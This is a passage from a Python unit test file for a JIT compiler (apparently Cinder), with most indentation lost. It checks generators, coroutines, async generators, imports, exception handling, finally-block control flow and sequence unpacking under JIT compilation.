def test_nested_func_outlives_parent(self):
@unittest.failUnlessJITCompiled
def nested(x):
@unittest.failUnlessJITCompiled
def inner(y):
return x + y
return inner
nested_ref = weakref.ref(nested)
add_5 = nested(5)
nested = None
self.assertIsNone(nested_ref())
self.assertEqual(add_5(10), 15)
class TempNameTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _tmp_name(self, a, b):
tmp1 = "hello"
c = a + b
return tmp1
def test_tmp_name(self):
self.assertEqual(self._tmp_name(1, 2), "hello")
@unittest.failUnlessJITCompiled
def test_tmp_name2(self):
v0 = 5
self.assertEqual(v0, 5)
class DummyContainer:
def __len__(self):
raise Exception("hello!")
class ExceptionInConditional(unittest.TestCase):
@unittest.failUnlessJITCompiled
def doit(self, x):
if x:
return 1
return 2
def test_exception_thrown_in_conditional(self):
with self.assertRaisesRegex(Exception, "hello!"):
self.doit(DummyContainer())
class JITCompileCrasherRegressionTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _fstring(self, flag, it1, it2):
for a in it1:
for b in it2:
if flag:
return f"{a}"
def test_fstring_no_fmt_spec_in_nested_loops_and_if(self):
self.assertEqual(self._fstring(True, [1], [1]), "1")
@unittest.failUnlessJITCompiled
async def _sharedAwait(self, x, y, z):
return await (x() if y else z())
def test_shared_await(self):
async def zero():
return 0
async def one():
return 1
with self.assertRaises(StopIteration) as exc:
self._sharedAwait(zero, True, one).send(None)
self.assertEqual(exc.exception.value, 0)
with self.assertRaises(StopIteration) as exc:
self._sharedAwait(zero, False, one).send(None)
self.assertEqual(exc.exception.value, 1)
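# Helpers for TinyFrames.test_dealloc_reused_frame: SomeValue's finalizer forces frame
# materialization and then calls a JIT-compiled function, exercising reuse of a freed
# tiny frame.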
def jitted_func():
return 1
class SomeValue:
def __init__(self):
self._finalizer = weakref.finalize(self, self._cleanup)
@classmethod
def _cleanup(cls):
        # Trigger frame materialization; it should deallocate the tiny frame that was
        # used to call jitted()
a = sys._getframe()
        # Invoke a JIT-compiled function, which should reuse the frame deallocated on
        # the previous line and reset its refcount to 1
jitted_func()
class SomeClass:
def nonjitted(self):
# suppress JIT
try:
pass
except:
pass
val = SomeValue()
def jitted(self):
self.nonjitted()
class TinyFrames(unittest.TestCase):
def test_dealloc_reused_frame(self):
# suppress JIT
try:
pass
except:
pass
c = SomeClass()
c.jitted()
class UnwindStateTests(unittest.TestCase):
def _raise(self):
# Separate from _copied_locals because we don't support RAISE_VARARGS
# yet.
raise RuntimeError()
@unittest.failUnlessJITCompiled
def _copied_locals(self, a):
b = c = a
self._raise()
def test_copied_locals_in_frame(self):
try:
self._copied_locals("hello")
except RuntimeError as re:
f_locals = re.__traceback__.tb_next.tb_frame.f_locals
self.assertEqual(
f_locals, {"self": self, "a": "hello", "b": "hello", "c": "hello"}
)
class ImportTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_import_name(self):
import math
self.assertEqual(int(math.pow(1, 2)), 1)
@unittest.failUnlessJITCompiled
def _fail_to_import_name(self):
import non_existent_module
def test_import_name_failure(self):
with self.assertRaises(ModuleNotFoundError):
self._fail_to_import_name()
@unittest.failUnlessJITCompiled
def test_import_from(self):
from math import pow as math_pow
self.assertEqual(int(math_pow(1, 2)), 1)
@unittest.failUnlessJITCompiled
def _fail_to_import_from(self):
from math import non_existent_attr
def test_import_from_failure(self):
with self.assertRaises(ImportError):
self._fail_to_import_from()
class RaiseTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _jitRaise(self, exc):
raise exc
@unittest.failUnlessJITCompiled
def _jitRaiseCause(self, exc, cause):
raise exc from cause
@unittest.failUnlessJITCompiled
def _jitReraise(self):
raise
def test_raise_type(self):
with self.assertRaises(ValueError):
self._jitRaise(ValueError)
def test_raise_value(self):
with self.assertRaises(ValueError) as exc:
self._jitRaise(ValueError(1))
self.assertEqual(exc.exception.args, (1,))
def test_raise_with_cause(self):
cause = ValueError(2)
cause_tb_str = f"{cause.__traceback__}"
with self.assertRaises(ValueError) as exc:
self._jitRaiseCause(ValueError(1), cause)
self.assertIs(exc.exception.__cause__, cause)
self.assertEqual(f"{exc.exception.__cause__.__traceback__}", cause_tb_str)
def test_reraise(self):
original_raise = ValueError(1)
with self.assertRaises(ValueError) as exc:
try:
raise original_raise
except ValueError:
self._jitReraise()
self.assertIs(exc.exception, original_raise)
def test_reraise_of_nothing(self):
with self.assertRaises(RuntimeError) as exc:
self._jitReraise()
self.assertEqual(exc.exception.args, ("No active exception to reraise",))
class GeneratorsTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _f1(self):
yield 1
def test_basic_operation(self):
g = self._f1()
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertIsNone(exc.exception.value)
@unittest.failUnlessJITCompiled
def _f2(self):
yield 1
yield 2
return 3
def test_multi_yield_and_return(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 3)
@unittest.failUnlessJITCompiled
def _f3(self):
a = yield 1
b = yield 2
return a + b
def test_receive_values(self):
g = self._f3()
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(100), 2)
with self.assertRaises(StopIteration) as exc:
g.send(1000)
self.assertEqual(exc.exception.value, 1100)
@unittest.failUnlessJITCompiled
def _f4(self, a):
yield a
yield a
return a
def test_one_arg(self):
g = self._f4(10)
self.assertEqual(g.send(None), 10)
self.assertEqual(g.send(None), 10)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 10)
@unittest.failUnlessJITCompiled
def _f5(
self, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16
):
v = (
yield a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
a1 <<= v
a2 <<= v
a3 <<= v
a4 <<= v
a5 <<= v
a6 <<= v
a7 <<= v
a8 <<= v
a9 <<= v
a10 <<= v
a11 <<= v
a12 <<= v
a13 <<= v
a14 <<= v
a15 <<= v
a16 <<= v
v = (
yield a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
a1 <<= v
a2 <<= v
a3 <<= v
a4 <<= v
a5 <<= v
a6 <<= v
a7 <<= v
a8 <<= v
a9 <<= v
a10 <<= v
a11 <<= v
a12 <<= v
a13 <<= v
a14 <<= v
a15 <<= v
a16 <<= v
return (
a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
def test_save_all_registers_and_spill(self):
g = self._f5(
0x1,
0x2,
0x4,
0x8,
0x10,
0x20,
0x40,
0x80,
0x100,
0x200,
0x400,
0x800,
0x1000,
0x2000,
0x4000,
0x8000,
)
self.assertEqual(g.send(None), 0xFFFF)
self.assertEqual(g.send(1), 0xFFFF << 1)
with self.assertRaises(StopIteration) as exc:
g.send(2)
self.assertEqual(exc.exception.value, 0xFFFF << 3)
def test_for_loop_driven(self):
l = []
for x in self._f2():
l.append(x)
self.assertEqual(l, [1, 2])
@unittest.failUnlessJITCompiled
def _f6(self):
i = 0
while i < 1000:
i = yield i
def test_many_iterations(self):
g = self._f6()
self.assertEqual(g.send(None), 0)
for i in range(1, 1000):
self.assertEqual(g.send(i), i)
with self.assertRaises(StopIteration) as exc:
g.send(1000)
self.assertIsNone(exc.exception.value)
def _f_raises(self):
raise ValueError
@unittest.failUnlessJITCompiled
def _f7(self):
self._f_raises()
yield 1
def test_raise(self):
g = self._f7()
with self.assertRaises(ValueError):
g.send(None)
def test_throw_into_initial_yield(self):
g = self._f1()
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_throw_into_yield(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_close_on_initial_yield(self):
g = self._f1()
g.close()
def test_close_on_yield(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
g.close()
@unittest.failUnlessJITCompiled
def _f8(self, a):
x += yield a
def test_do_not_deopt_before_initial_yield(self):
g = self._f8(1)
with self.assertRaises(UnboundLocalError):
g.send(None)
@unittest.failUnlessJITCompiled
def _f9(self, a):
yield
return a
def test_incref_args(self):
class X:
pass
g = self._f9(X())
g.send(None)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertIsInstance(exc.exception.value, X)
@unittest.failUnlessJITCompiled
def _f10(self, X):
x = X()
yield weakref.ref(x)
return x
def test_gc_traversal(self):
class X:
pass
g = self._f10(X)
weak_ref_x = g.send(None)
self.assertIn(weak_ref_x(), gc.get_objects())
referrers = gc.get_referrers(weak_ref_x())
self.assertEqual(len(referrers), 1)
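        # Under the JIT the generator object owns its state directly, so it (rather
        # than a frame) shows up as the referrer.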
if unittest.case.CINDERJIT_ENABLED:
self.assertIs(referrers[0], g)
else:
self.assertIs(referrers[0], g.gi_frame)
with self.assertRaises(StopIteration):
g.send(None)
def test_resuming_in_another_thread(self):
g = self._f1()
def thread_function(g):
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration):
g.send(None)
t = threading.Thread(target=thread_function, args=(g,))
t.start()
t.join()
def test_release_data_on_discard(self):
o = object()
base_count = sys.getrefcount(o)
g = self._f9(o)
self.assertEqual(sys.getrefcount(o), base_count + 1)
del g
self.assertEqual(sys.getrefcount(o), base_count)
@unittest.failUnlessJITCompiled
def _f12(self, g):
a = yield from g
return a
def test_yield_from_generator(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 3)
def test_yield_from_iterator(self):
g = self._f12([1, 2])
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration):
g.send(None)
def test_yield_from_forwards_raise_down(self):
def f():
try:
yield 1
except ValueError:
return 2
return 3
g = self._f12(f())
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration) as exc:
g.throw(ValueError)
self.assertEqual(exc.exception.value, 2)
def test_yield_from_forwards_raise_up(self):
def f():
raise ValueError
yield 1
g = self._f12(f())
with self.assertRaises(ValueError):
g.send(None)
def test_yield_from_passes_raise_through(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_yield_from_forwards_close_down(self):
saw_close = False
def f():
nonlocal saw_close
try:
yield 1
except GeneratorExit:
saw_close = True
return 2
g = self._f12(f())
self.assertEqual(g.send(None), 1)
g.close()
self.assertTrue(saw_close)
def test_yield_from_passes_close_through(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
g.close()
def test_assert_on_yield_from_coro(self):
async def coro():
pass
c = coro()
with self.assertRaises(TypeError) as exc:
self._f12(c).send(None)
self.assertEqual(
str(exc.exception),
"cannot 'yield from' a coroutine object in a non-coroutine generator",
)
# Suppress warning
c.close()
def test_gen_close(self):
"""Finalize generators immediately on unwind.
Necessary to ensure that generator cleanups occur when they should.
"""
stack = []
try:
self._gen_close_jitme(stack)
except RuntimeError:
left_on_stack = list(stack)
else:
self.fail("RuntimeError should have been raised")
self.assertEqual(stack, [])
self.assertEqual(left_on_stack, [])
@unittest.failUnlessJITCompiled
def _gen_close_jitme(self, stack):
for x in self._gen_close_gen(stack):
if x == 1:
# _gen_close_gen needs to be finalized immediately when we
# unwind from here; our caller should never run within its context
raise RuntimeError("boom")
def _gen_close_gen(self, stack):
for x in [0, 1, 2]:
stack.append(x)
try:
yield x
finally:
assert stack.pop() == x
def test_gen_freelist(self):
"""Exercise making a JITted generator with gen_data memory off the freelist."""
# make and dealloc a small coro, which will put its memory area on the freelist
sc = self.small_coro()
with self.assertRaises(StopIteration):
sc.send(None)
del sc
# run another coro to verify we didn't put a bad pointer on the freelist
sc2 = self.small_coro()
with self.assertRaises(StopIteration):
sc2.send(None)
del sc2
# make a big coro and then deallocate it, bypassing the freelist
bc = self.big_coro()
with self.assertRaises(StopIteration):
bc.send(None)
del bc
@unittest.failUnlessJITCompiled
async def big_coro(self):
# This currently results in a max spill size of ~100, but that could
# change with JIT register allocation improvements. This test is only
# testing what it intends to as long as the max spill size of this
# function is greater than jit::kMinGenSpillWords. Ideally we'd assert
# that in the test, but neither value is introspectable from Python.
return dict(
a=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
b=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
c=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
d=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
e=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
f=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
g=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
h=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
)
@unittest.failUnlessJITCompiled
async def small_coro(self):
return 1
def test_generator_globals(self):
val1 = "a value"
val2 = "another value"
gbls = {"A_GLOBAL": val1}
@with_globals(gbls)
def gen():
yield A_GLOBAL
yield A_GLOBAL
g = gen()
self.assertIs(g.__next__(), val1)
gbls["A_GLOBAL"] = val2
del gbls
self.assertIs(g.__next__(), val2)
with self.assertRaises(StopIteration):
g.__next__()
class CoroutinesTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
async def _f1(self):
return 1
@unittest.failUnlessJITCompiled
async def _f2(self, await_target):
return await await_target
def test_basic_coroutine(self):
c = self._f2(self._f1())
with self.assertRaises(StopIteration) as exc:
c.send(None)
self.assertEqual(exc.exception.value, 1)
def test_cannot_await_coro_already_awaiting_on_a_sub_iterator(self):
class DummyAwaitable:
def __await__(self):
return iter([1])
c = self._f2(DummyAwaitable())
self.assertEqual(c.send(None), 1)
with self.assertRaises(RuntimeError) as exc:
self._f2(c).send(None)
self.assertEqual(str(exc.exception), "coroutine is being awaited already")
def test_works_with_asyncio(self):
try:
asyncio.run(self._f2(asyncio.sleep(0.1)))
finally:
# This is needed to avoid an "environment changed" error
asyncio.set_event_loop_policy(None)
@unittest.failUnlessJITCompiled
@asyncio.coroutine
def _f3(self):
yield 1
return 2
def test_pre_async_coroutine(self):
c = self._f3()
self.assertEqual(c.send(None), 1)
with self.assertRaises(StopIteration) as exc:
c.send(None)
self.assertEqual(exc.exception.value, 2)
@staticmethod
@unittest.failUnlessJITCompiled
async def _use_async_with(mgr_type):
async with mgr_type():
pass
def test_bad_awaitable_in_with(self):
class BadAEnter:
def __aenter__(self):
pass
async def __aexit__(self, exc, ty, tb):
pass
class BadAExit:
async def __aenter__(self):
pass
def __aexit__(self, exc, ty, tb):
pass
with self.assertRaisesRegex(
TypeError,
"'async with' received an object from __aenter__ "
"that does not implement __await__: NoneType",
):
asyncio.run(self._use_async_with(BadAEnter))
with self.assertRaisesRegex(
TypeError,
"'async with' received an object from __aexit__ "
"that does not implement __await__: NoneType",
):
asyncio.run(self._use_async_with(BadAExit))
class EagerCoroutineDispatch(StaticTestBase):
def _assert_awaited_flag_seen(self, async_f_under_test):
awaited_capturer = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = async_f_under_test(awaited_capturer)
# TestAwaitedCall doesn't actually return a coroutine. This doesn't
# matter though because by the time a TypeError is raised we run far
# enough to know if the awaited flag was passed.
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
def _assert_awaited_flag_not_seen(self, async_f_under_test):
awaited_capturer = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = async_f_under_test(awaited_capturer)
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
@unittest.failUnlessJITCompiled
async def _call_ex(self, t):
t(*[1])
@unittest.failUnlessJITCompiled
async def _call_ex_awaited(self, t):
await t(*[1])
@unittest.failUnlessJITCompiled
async def _call_ex_kw(self, t):
t(*[1], **{2: 3})
@unittest.failUnlessJITCompiled
async def _call_ex_kw_awaited(self, t):
await t(*[1], **{2: 3})
@unittest.failUnlessJITCompiled
async def _call_method(self, t):
# https://stackoverflow.com/questions/19476816/creating-an-empty-object-in-python
o = type("", (), {})()
o.t = t
o.t()
@unittest.failUnlessJITCompiled
async def _call_method_awaited(self, t):
o = type("", (), {})()
o.t = t
await o.t()
@unittest.failUnlessJITCompiled
async def _vector_call(self, t):
t()
@unittest.failUnlessJITCompiled
async def _vector_call_awaited(self, t):
await t()
@unittest.failUnlessJITCompiled
async def _vector_call_kw(self, t):
t(a=1)
@unittest.failUnlessJITCompiled
async def _vector_call_kw_awaited(self, t):
await t(a=1)
def test_call_ex(self):
self._assert_awaited_flag_not_seen(self._call_ex)
def test_call_ex_awaited(self):
self._assert_awaited_flag_seen(self._call_ex_awaited)
def test_call_ex_kw(self):
self._assert_awaited_flag_not_seen(self._call_ex_kw)
def test_call_ex_kw_awaited(self):
self._assert_awaited_flag_seen(self._call_ex_kw_awaited)
def test_call_method(self):
self._assert_awaited_flag_not_seen(self._call_method)
def test_call_method_awaited(self):
self._assert_awaited_flag_seen(self._call_method_awaited)
def test_vector_call(self):
self._assert_awaited_flag_not_seen(self._vector_call)
def test_vector_call_awaited(self):
self._assert_awaited_flag_seen(self._vector_call_awaited)
def test_vector_call_kw(self):
self._assert_awaited_flag_not_seen(self._vector_call_kw)
def test_vector_call_kw_awaited(self):
self._assert_awaited_flag_seen(self._vector_call_kw_awaited)
def test_invoke_function(self):
codestr = f"""
def x() -> None:
pass
async def await_x() -> None:
await x()
async def call_x() -> None:
c = x()
def fixup():
import _testcapi
global x
x = _testcapi.TestAwaitedCall()
"""
c = self.compile(codestr, StaticCodeGenerator, modname="foo.py")
await_x = self.find_code(c, "await_x")
self.assertInBytecode(await_x, "INVOKE_FUNCTION", (("foo.py", "x"), 0))
call_x = self.find_code(c, "call_x")
self.assertInBytecode(call_x, "INVOKE_FUNCTION", (("foo.py", "x"), 0))
with self.in_module(codestr) as mod:
mod["fixup"]()
self.assertIsInstance(mod["x"], _testcapi.TestAwaitedCall)
self.assertIsNone(mod["x"].last_awaited())
coro = mod["await_x"]()
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(mod["x"].last_awaited())
self.assertIsNone(mod["x"].last_awaited())
coro = mod["call_x"]()
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(mod["x"].last_awaited())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(mod["await_x"]))
self.assertTrue(cinderjit.is_jit_compiled(mod["call_x"]))
def test_invoke_method(self):
codestr = f"""
class X:
def x(self) -> None:
pass
async def await_x() -> None:
await X().x()
async def call_x() -> None:
X().x()
"""
c = self.compile(codestr, StaticCodeGenerator, modname="foo.py")
await_x = self.find_code(c, "await_x")
self.assertInBytecode(await_x, "INVOKE_METHOD", (("foo.py", "X", "x"), 0))
call_x = self.find_code(c, "call_x")
self.assertInBytecode(call_x, "INVOKE_METHOD", (("foo.py", "X", "x"), 0))
with self.in_module(codestr) as mod:
awaited_capturer = mod["X"].x = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = mod["await_x"]()
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
coro = mod["call_x"]()
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(awaited_capturer.last_awaited())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(mod["await_x"]))
self.assertTrue(cinderjit.is_jit_compiled(mod["call_x"]))
async def y():
await DummyAwaitable()
def test_async_yielding(self):
class DummyAwaitable:
def __await__(self):
return iter([1, 2])
coro = self._vector_call_awaited(DummyAwaitable)
self.assertEqual(coro.send(None), 1)
self.assertEqual(coro.send(None), 2)
class AsyncGeneratorsTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
async def _f1(self, awaitable):
x = yield 1
yield x
await awaitable
def test_basic_coroutine(self):
class DummyAwaitable:
def __await__(self):
return iter([3])
async_gen = self._f1(DummyAwaitable())
# Step 1: move through "yield 1"
async_itt1 = async_gen.asend(None)
with self.assertRaises(StopIteration) as exc:
async_itt1.send(None)
self.assertEqual(exc.exception.value, 1)
# Step 2: send in and receive out 2 via "yield x"
async_itt2 = async_gen.asend(2)
with self.assertRaises(StopIteration) as exc:
async_itt2.send(None)
self.assertEqual(exc.exception.value, 2)
# Step 3: yield of "3" from DummyAwaitable
async_itt3 = async_gen.asend(None)
self.assertEqual(async_itt3.send(None), 3)
# Step 4: complete
with self.assertRaises(StopAsyncIteration):
async_itt3.send(None)
@unittest.failUnlessJITCompiled
async def _f2(self, asyncgen):
res = []
async for x in asyncgen:
res.append(x)
return res
def test_for_iteration(self):
async def asyncgen():
yield 1
yield 2
self.assertEqual(asyncio.run(self._f2(asyncgen())), [1, 2])
def _assertExceptionFlowsThroughYieldFrom(self, exc):
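        # Walk to the traceback frame just above the one that raised and check that
        # its last executed instruction was a YIELD_FROM, i.e. the exception
        # propagated through the yield-from path.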
tb_prev = None
tb = exc.__traceback__
while tb.tb_next:
tb_prev = tb
tb = tb.tb_next
instrs = [x for x in dis.get_instructions(tb_prev.tb_frame.f_code)]
self.assertEqual(instrs[tb_prev.tb_lasti // 2].opname, "YIELD_FROM")
def test_for_exception(self):
async def asyncgen():
yield 1
raise ValueError
# Can't use self.assertRaises() as this clears exception tracebacks
try:
asyncio.run(self._f2(asyncgen()))
except ValueError as e:
self._assertExceptionFlowsThroughYieldFrom(e)
else:
self.fail("Expected ValueError to be raised")
@unittest.failUnlessJITCompiled
async def _f3(self, asyncgen):
return [x async for x in asyncgen]
def test_comprehension(self):
async def asyncgen():
yield 1
yield 2
self.assertEqual(asyncio.run(self._f3(asyncgen())), [1, 2])
def test_comprehension_exception(self):
async def asyncgen():
yield 1
raise ValueError
# Can't use self.assertRaises() as this clears exception tracebacks
try:
asyncio.run(self._f3(asyncgen()))
except ValueError as e:
self._assertExceptionFlowsThroughYieldFrom(e)
else:
self.fail("Expected ValueError to be raised")
class Err1(Exception):
pass
class Err2(Exception):
pass
class ExceptionHandlingTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def try_except(self, func):
try:
func()
except:
return True
return False
def test_raise_and_catch(self):
def f():
raise Exception("hello")
self.assertTrue(self.try_except(f))
def g():
pass
self.assertFalse(self.try_except(g))
@unittest.failUnlessJITCompiled
def catch_multiple(self, func):
try:
func()
except Err1:
return 1
except Err2:
return 2
def test_multiple_except_blocks(self):
def f():
raise Err1("err1")
self.assertEqual(self.catch_multiple(f), 1)
def g():
raise Err2("err2")
self.assertEqual(self.catch_multiple(g), 2)
@unittest.failUnlessJITCompiled
def reraise(self, func):
try:
func()
except:
raise
def test_reraise(self):
def f():
raise Exception("hello")
with self.assertRaisesRegex(Exception, "hello"):
self.reraise(f)
@unittest.failUnlessJITCompiled
def try_except_in_loop(self, niters, f):
for i in range(niters):
try:
try:
f(i)
except Err2:
pass
except Err1:
break
return i
def test_try_except_in_loop(self):
def f(i):
if i == 10:
raise Err1("hello")
self.assertEqual(self.try_except_in_loop(20, f), 10)
@unittest.failUnlessJITCompiled
def nested_try_except(self, f):
try:
try:
try:
f()
except:
raise
except:
raise
except:
return 100
def test_nested_try_except(self):
def f():
raise Exception("hello")
self.assertEqual(self.nested_try_except(f), 100)
@unittest.failUnlessJITCompiled
def try_except_in_generator(self, f):
try:
yield f(0)
yield f(1)
yield f(2)
except:
yield 123
def test_except_in_generator(self):
def f(i):
if i == 1:
raise Exception("hello")
return
g = self.try_except_in_generator(f)
next(g)
self.assertEqual(next(g), 123)
@unittest.failUnlessJITCompiled
def try_finally(self, should_raise):
result = None
try:
if should_raise:
raise Exception("testing 123")
finally:
result = 100
return result
def test_try_finally(self):
self.assertEqual(self.try_finally(False), 100)
with self.assertRaisesRegex(Exception, "testing 123"):
self.try_finally(True)
@unittest.failUnlessJITCompiled
def try_except_finally(self, should_raise):
result = None
try:
if should_raise:
raise Exception("testing 123")
except Exception:
result = 200
finally:
if result is None:
result = 100
return result
def test_try_except_finally(self):
self.assertEqual(self.try_except_finally(False), 100)
self.assertEqual(self.try_except_finally(True), 200)
@unittest.failUnlessJITCompiled
def return_in_finally(self, v):
try:
pass
finally:
return v
@unittest.failUnlessJITCompiled
def return_in_finally2(self, v):
try:
return v
finally:
return 100
@unittest.failUnlessJITCompiled
def return_in_finally3(self, v):
try:
1 / 0
finally:
return v
@unittest.failUnlessJITCompiled
def return_in_finally4(self, v):
try:
return 100
finally:
try:
1 / 0
finally:
return v
def test_return_in_finally(self):
self.assertEqual(self.return_in_finally(100), 100)
self.assertEqual(self.return_in_finally2(200), 100)
self.assertEqual(self.return_in_finally3(300), 300)
self.assertEqual(self.return_in_finally4(400), 400)
@unittest.failUnlessJITCompiled
def break_in_finally_after_return(self, x):
for count in [0, 1]:
count2 = 0
while count2 < 20:
count2 += 10
try:
return count + count2
finally:
if x:
break
return "end", count, count2
@unittest.failUnlessJITCompiled
def break_in_finally_after_return2(self, x):
for count in [0, 1]:
for count2 in [10, 20]:
try:
return count + count2
finally:
if x:
break
return "end", count, count2
def test_break_in_finally_after_return(self):
self.assertEqual(self.break_in_finally_after_return(False), 10)
self.assertEqual(self.break_in_finally_after_return(True), ("end", 1, 10))
self.assertEqual(self.break_in_finally_after_return2(False), 10)
self.assertEqual(self.break_in_finally_after_return2(True), ("end", 1, 10))
@unittest.failUnlessJITCompiled
def continue_in_finally_after_return(self, x):
count = 0
while count < 100:
count += 1
try:
return count
finally:
if x:
continue
return "end", count
@unittest.failUnlessJITCompiled
def continue_in_finally_after_return2(self, x):
for count in [0, 1]:
try:
return count
finally:
if x:
continue
return "end", count
def test_continue_in_finally_after_return(self):
self.assertEqual(self.continue_in_finally_after_return(False), 1)
self.assertEqual(self.continue_in_finally_after_return(True), ("end", 100))
self.assertEqual(self.continue_in_finally_after_return2(False), 0)
self.assertEqual(self.continue_in_finally_after_return2(True), ("end", 1))
@unittest.failUnlessJITCompiled
def return_in_loop_in_finally(self, x):
try:
for _ in [1, 2, 3]:
if x:
return x
finally:
pass
return 100
def test_return_in_loop_in_finally(self):
self.assertEqual(self.return_in_loop_in_finally(True), True)
self.assertEqual(self.return_in_loop_in_finally(False), 100)
@unittest.failUnlessJITCompiled
def conditional_return_in_finally(self, x, y, z):
try:
if x:
return x
if y:
return y
finally:
pass
return z
def test_conditional_return_in_finally(self):
self.assertEqual(self.conditional_return_in_finally(100, False, False), 100)
self.assertEqual(self.conditional_return_in_finally(False, 200, False), 200)
self.assertEqual(self.conditional_return_in_finally(False, False, 300), 300)
@unittest.failUnlessJITCompiled
def nested_finally(self, x):
try:
if x:
return x
finally:
try:
y = 10
finally:
z = y
return z
def test_nested_finally(self):
self.assertEqual(self.nested_finally(100), 100)
self.assertEqual(self.nested_finally(False), 10)
class UnpackSequenceTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _unpack_arg(self, seq, which):
a, b, c, d = seq
if which == "a":
return a
if which == "b":
return b
if which == "c":
return c
return d
@unittest.failUnlessJITCompiled
def _unpack_ex_arg(self, seq, which):
a, b, *c, d = seq
if which == "a":
return a
if which == "b":
return b
if which == "c":
return c
return d
def test_unpack_tuple(self):
self.assertEqual(self._unpack_arg(("eh", "bee", "see", "dee"), "b"), "bee")
self.assertEqual(self._unpack_arg((3, 2, 1, 0), "c"), 1)
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_tuple_wrong_size(self):
with self.assertRaises(ValueError):
self._unpack_arg((1, 2, 3, 4, 5), "a")
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_list(self):
self.assertEqual(self._unpack_arg(["one", "two", "three", "four"], "a"), "one")
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_gen(self):
def gen():
yield "first"
yield "second"
yield "third"
yield "fourth"
self.assertEqual(self._unpack_arg(gen(), "d"), "fourth")
@unittest.failUnlessJITCompiled
def _unpack_not_iterable(self):
(a, b, *c) = 1
@unittest.failUnlessJITCompiled
def _unpack_insufficient_values(self):
(a, b, *c) = [1]
@unittest.failUnlessJITCompiled
def _unpack_insufficient_values_after(self):
(a, *b, c, d) = [1, 2]
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_ex(self):
with self.assertRaises(TypeError):
self._unpack_not_iterable()
with self.assertRaises(ValueError):
self._unpack_insufficient_values()
with self.assertRaises(ValueError):
self._unpack_insufficient_values_after()
seq = [1, 2, 3, 4, 5, 6]
self.assertEqual(self._unpack_ex_arg(seq, "a"), 1)
self.assertEqual(self._unpack_ex_arg(seq, "b"), 2)
self.assertEqual(self._unpack_ex_arg(seq, "c"), [3, 4, 5])
self.assertEqual(self._unpack_ex_arg(seq, "d"), 6)
class DeleteSubscrTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _delit(self, container, key):
del container[key]
def test_builtin_types(self):
l = [1, 2, 3]
self._delit(l, 1)
self.assertEqual(l, [1, 3])
d = {"foo": 1, "bar": 2}
